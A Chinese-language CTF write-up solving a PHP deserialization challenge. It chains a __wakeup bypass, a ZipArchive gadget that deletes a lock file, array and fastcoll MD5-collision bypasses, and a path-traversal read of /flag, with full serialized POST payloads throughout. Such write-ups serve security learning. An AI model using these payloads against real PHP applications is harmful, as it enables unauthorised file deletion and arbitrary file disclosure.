打开环境
<?php
error_reporting(0);
ini_set("display_errors","Off");
class Jesen {
public $filename;
public $content;
public $me;
function __wakeup(){
$this->me = new Ctf();
}
function __destruct() {
$this->me->open($this->filename,$this->content);
}
}
class Ctf {
function __toString() {
return "die";
}
function open($filename, $content){
if(!file_get_contents("./sandbox/lock.lock")){
echo file_get_contents(substr($_POST['b'],0,30));
die();
}else{
file_put_contents("./sandbox/".md5($filename.time()),$content);
die("or you can guess the final filename?");
}
}
}
if(!isset($_POST['a'])){
highlight_file(__FILE__);
die();
}else{
if(($_POST['b'] != $_POST['a']) && (md5($_POST['b']) === md5($_POST['a']))){
unserialize($_POST['c']);
}
}
代码很简单不多说 这个代码审计的关键在这里
function open($filename, $content){
if(!file_get_contents("./sandbox/lock.lock")){
echo file_get_contents(substr($_POST['b'],0,30));
die();
}else{
file_put_contents("./sandbox/".md5($filename.time()),$content);
die("or you can guess the final filename?");
}
第一步 需要绕过wakeup
然后进这里后 ./sandbox/lock.lock这个文件存在就会到else,我们试试访问这个文件,发现它是存在的,所以到else
else这里很明显是让我们猜文件名
但它文件名又是通过md5加密的
所以想猜出来基本没有可能
到这里就会需要我们利用 ZipArchive 内置类的open方法达到删除文件效果
ZipArchive 内置类删除文件实例
php利用ZipArchive类操作文件的实例
可以去了解一下
所以这块我们的payload为:
<?php
class Jesen {
public $filename = './sandbox/lock.lock';
public $content = 8;
public $me;}
$a = new Jesen();
$zip = new ZipArchive;
$a->me = $zip;
$b = serialize($a);
$b = str_replace('":3:','":4:',$b);
echo $b;
echo "\n";
然后post上传
a[]=1&b[]=2&c=O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}
这里用数组绕过md5的比较
然后再进行访问那个文件,会发现不存在了 ,所以成功绕过,接下来会执行这一步
echo file_get_contents(substr($_POST['b'],0,30));
这里就是我们要控制b把来利用file_get_contents获取flag
然后题目给了提示 fastcoll内置类反序列化flag在/flag
所以我们这里要利用fastcoll这个工具
fastcoll
简单说就是它能生成两个md5值相等,但是Hash值不相等的文件
所以这里可以利用它来给a,b赋值绕过,
这里我们b可以这样给值
./../../../../../../../../flag
应该也能利用伪协议,大家都可以去试试,直接这样是最简单的
这里跑出来两个文件
我还是不太确定是否成功
所以我用php脚本检查一下
<?php
function readmyfile($path){
$fh=fopen($path,"rb");
$data=fread($fh,filesize($path));
fclose($fh);
return$data;
}
echo md5( (readmyfile("1.txt")));
echo '============================';
//echo urlencode(readmyfile("1.txt"));
echo md5( (readmyfile("2.txt")));
//echo '============================';
//echo urlencode(readmyfile("2.txt"));
发现确实一样
所以可以直接URL编码了
<?php
function readmyfile($path){
$fh=fopen($path,"rb");
$data=fread($fh,filesize($path));
fclose($fh);
return$data;
}
//echo md5( (readmyfile("1.txt")));
//echo '============================';
echo urlencode(readmyfile("1.txt"));
//echo md5( (readmyfile("2.txt")));
echo '============================';
echo urlencode(readmyfile("2.txt"));
.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A5%D3o%83%14%14%E0%23%E1%05%DB+%19%3F%EF%D6N%F5%3Co%5EL%7C%13%0C%B6%40%BE%97%C7%B5%0B%82%BB%F6%E4l%AE%E9hk%06G%F2%9CY%23%18%E5%B6%5C%94%FD%AC%B6%FA%2C%7D%E0%3B%04%E5s4%7E%F6%CFX%02A%E9%FD%EF%C3%084%12%E7_%80%FD%CE%B0N%F7j%0Bkt%2B%9CGO%60%E5%C12B%C5%2A%84H%A3%16l%9C%EF%B8%08%C1%DE%22%7F%99hE%AC%DA+%BD%A0%89-%60%BF%B2%5B%BE============================.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A5%D3o%83%14%14%E0%23%E1%05%DB+%19%3F%EF%D6N%F5%3C%EF%5EL%7C%13%0C%B6%40%BE%97%C7%B5%0B%82%BB%F6%E4l%AE%E9hk%06G%F2%9C%D9%23%18%E5%B6%5C%94%FD%AC%B6%FA%2C%7D%E0%BB%04%E5s4%7E%F6%CFX%02A%E9%FD%EF%C3%084%12%E7_%80%FD%CE%B0%CE%F7j%0Bkt%2B%9CGO%60%E5%C12B%C5%2A%84H%A3%16l%9C%EF%B8%08A%DE%22%7F%99hE%AC%DA+%BD%A0%89-%E0%BF%B2%5B%BE
然后有a,b了我们还需要c的值
<?php
class Jesen{
public$filename;
public$content;
public$me;
}
$a = new Jesen();
echo serialize($a);
O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}
然后进行post传参就能得到flag了
a=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%AA%E9%86v%A1b%E9g%7B%C8%8A%84q%C3%7D%E0%B8%83%9B%EA%1C%E1%86%19%17%5E%3A%11%B9%A2%AB%E5%9C%1B%B6%0D%3E%84%D6%F2%8F%E8%EF1%BFm%95%F7%BC%87%C2%D9k%5D4%F1%FE%D7%F7%7B%A5%A0%DF%5D%C5P%BB%0D%27%12%D1%0DlLR%B1%D7%B4%22%D3u%60H%276%BD+%8At%C9%BF%5BOLOAp%C6%C8%AA%82k%93%9E%E8%BC%EB%B8s2%87I%DC%18%2F_I%22%F0%F3%CF%5D%05%9D%B2%0B%7DU&b=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%AA%E9%86v%A1b%E9g%7B%C8%8A%84q%C3%7D%E0%B8%83%9Bj%1C%E1%86%19%17%5E%3A%11%B9%A2%AB%E5%9C%1B%B6%0D%3E%84%D6%F2%8F%E8%EF1%BF%ED%95%F7%BC%87%C2%D9k%5D4%F1%FE%D7%F7%FB%A5%A0%DF%5D%C5P%BB%0D%27%12%D1%0DlLR%B1%D7%B4%22%D3u%60H%A76%BD+%8At%C9%BF%5BOLOAp%C6%C8%AA%82k%93%9E%E8%BC%EB%B8s%B2%86I%DC%18%2F_I%22%F0%F3%CF%5D%05%1D%B2%0B%7DU&c=O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}
希望这篇文章能够帮助你!